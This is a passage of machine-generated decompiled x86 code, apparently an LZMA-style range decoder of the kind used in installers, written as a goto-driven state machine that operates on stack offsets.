                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L100:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t334 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t334;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      											goto L101;
                                                                                                                                                                                      										case 0xd:
                                                                                                                                                                                      											L37:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												L159:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L38:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t122;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L39:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      												goto L48;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L40:
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												goto L54;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L41:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      											__eax = __eax + 1;
                                                                                                                                                                                      											__eax = __eax << 8;
                                                                                                                                                                                      											__eax = __eax + __ebx;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edx;
                                                                                                                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												L45:
                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0xe:
                                                                                                                                                                                      											L46:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												L160:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L47:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t156 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t156;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L48:
                                                                                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L49:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      												__esi = __edx + __eax;
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      												__ax =  *__esi;
                                                                                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      													__cx = __ax;
                                                                                                                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                      													__ebx = _t170;
                                                                                                                                                                                      													__cx = __ax >> 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *__esi = __ax;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                                                                                      													 *__esi = __cx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													continue;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													L53:
                                                                                                                                                                                      													goto L46;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L54:
                                                                                                                                                                                      											_t173 = __ebp - 0x34;
                                                                                                                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                      											__eflags =  *_t173;
                                                                                                                                                                                      											goto L55;
                                                                                                                                                                                      										case 0xf:
                                                                                                                                                                                      											L58:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												L161:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L59:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t203 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t203;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L60:
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												L55:
                                                                                                                                                                                      												__al =  *(__ebp - 0x44);
                                                                                                                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                      												goto L56;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L61:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      											__edx = __ebx + __ebx;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      											__esi = __edx + __eax;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                      												__ebx = _t217;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edi;
                                                                                                                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L60;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												L65:
                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x10:
                                                                                                                                                                                      											L109:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												L165:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L110:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t365 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t365;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											goto L111;
                                                                                                                                                                                      										case 0x11:
                                                                                                                                                                                      											L69:
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                      											goto L132;
                                                                                                                                                                                      										case 0x12:
                                                                                                                                                                                      											L128:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												L131:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      												L132:
                                                                                                                                                                                      												 *(_t644 - 0x54) = _t642;
                                                                                                                                                                                      												goto L133;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L129:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      											goto L130;
                                                                                                                                                                                      										case 0x13:
                                                                                                                                                                                      											L141:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												L143:
                                                                                                                                                                                      												_t469 = __ebp - 0x58;
                                                                                                                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      												__eflags =  *_t469;
                                                                                                                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      												L144:
                                                                                                                                                                                      												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                                                                                      												L145:
                                                                                                                                                                                      												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                      												goto L149;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L142:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      											L130:
                                                                                                                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      											 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      											goto L144;
                                                                                                                                                                                      										case 0x14:
                                                                                                                                                                                      											L156:
                                                                                                                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L140:
                                                                                                                                                                                      												 *(_t644 - 0x88) = _t537;
                                                                                                                                                                                      												goto L1;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x15:
                                                                                                                                                                                      											L91:
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      											__al = __al & 0x000000fd;
                                                                                                                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      											goto L120;
                                                                                                                                                                                      										case 0x16:
                                                                                                                                                                                      											goto L0;
                                                                                                                                                                                      										case 0x17:
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L145:
                                                                                                                                                                                      												 *(_t644 - 0x50) = 1;
                                                                                                                                                                                      												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                                      												goto L149;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0x18:
                                                                                                                                                                                      											goto L146;
                                                                                                                                                                                      										case 0x19:
                                                                                                                                                                                      											L94:
                                                                                                                                                                                      											__eflags = __ebx - 4;
                                                                                                                                                                                      											if(__ebx < 4) {
                                                                                                                                                                                      												L98:
                                                                                                                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                      												L119:
                                                                                                                                                                                      												_t393 = __ebp - 0x2c;
                                                                                                                                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                      												__eflags =  *_t393;
                                                                                                                                                                                      												L120:
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												if(__eax == 0) {
                                                                                                                                                                                      													L166:
                                                                                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                      													goto L170;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L121:
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                      													goto L171;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L122:
                                                                                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      												_t400 = __ebp - 0x60;
                                                                                                                                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                      												__eflags =  *_t400;
                                                                                                                                                                                      												goto L123;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L95:
                                                                                                                                                                                      											__ecx = __ebx;
                                                                                                                                                                                      											__eax = __ebx;
                                                                                                                                                                                      											__ecx = __ebx >> 1;
                                                                                                                                                                                      											__eax = __ebx & 0x00000001;
                                                                                                                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      											__al = __al | 0x00000002;
                                                                                                                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      											__eflags = __ebx - 0xe;
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											if(__ebx >= 0xe) {
                                                                                                                                                                                      												L97:
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      												L102:
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      													L107:
                                                                                                                                                                                      													__eax = __eax + __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                                                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      													__eax =  *(__ebp - 4);
                                                                                                                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													L108:
                                                                                                                                                                                      													__ebx = 0;
                                                                                                                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                                                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                                                                                                                      													L112:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                      														L118:
                                                                                                                                                                                      														_t391 = __ebp - 0x2c;
                                                                                                                                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                      														__eflags =  *_t391;
                                                                                                                                                                                      														goto L119;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													L113:
                                                                                                                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      													__esi = __edi + __eax;
                                                                                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      													__ax =  *__esi;
                                                                                                                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                      														__ecx = 0;
                                                                                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                      														__ecx = 1;
                                                                                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      														__ebx = 1;
                                                                                                                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                      														__ebx = 1 << __cl;
                                                                                                                                                                                      														__ecx = 1 << __cl;
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                      														__cx = __ax;
                                                                                                                                                                                      														__cx = __ax >> 5;
                                                                                                                                                                                      														__eax = __eax - __ecx;
                                                                                                                                                                                      														__edi = __edi + 1;
                                                                                                                                                                                      														__eflags = __edi;
                                                                                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      														 *__esi = __ax;
                                                                                                                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                      														0x800 = 0x800 - __ecx;
                                                                                                                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      														 *__esi = __dx;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      														L111:
                                                                                                                                                                                      														_t368 = __ebp - 0x48;
                                                                                                                                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                      														__eflags =  *_t368;
                                                                                                                                                                                      														goto L112;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														L117:
                                                                                                                                                                                      														goto L109;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L103:
                                                                                                                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                                                                                                                      													__eflags = __ebx;
                                                                                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      													L101:
                                                                                                                                                                                      													_t338 = __ebp - 0x48;
                                                                                                                                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      													__eflags =  *_t338;
                                                                                                                                                                                      													goto L102;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													L106:
                                                                                                                                                                                      													goto L99;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L96:
                                                                                                                                                                                      											__edx =  *(__ebp - 4);
                                                                                                                                                                                      											__eax = __eax - __ebx;
                                                                                                                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                      											goto L108;
                                                                                                                                                                                      										case 0x1a:
                                                                                                                                                                                      											L56:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      												L162:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L57:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                                                                                                                      											__edx =  *(__ebp - 8);
                                                                                                                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                      											__eax = __ecx + 1;
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      											__edx = _t192;
                                                                                                                                                                                      											goto L80;
                                                                                                                                                                                      										case 0x1b:
                                                                                                                                                                                      											L76:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      												L163:
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L77:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__edx =  *(__ebp - 8);
                                                                                                                                                                                      											__cl =  *(__eax + __edx);
                                                                                                                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      											 *(__eax + __edx) = __cl;
                                                                                                                                                                                      											__eax = __eax + 1;
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											_t275 = __eax %  *(__ebp - 0x74);
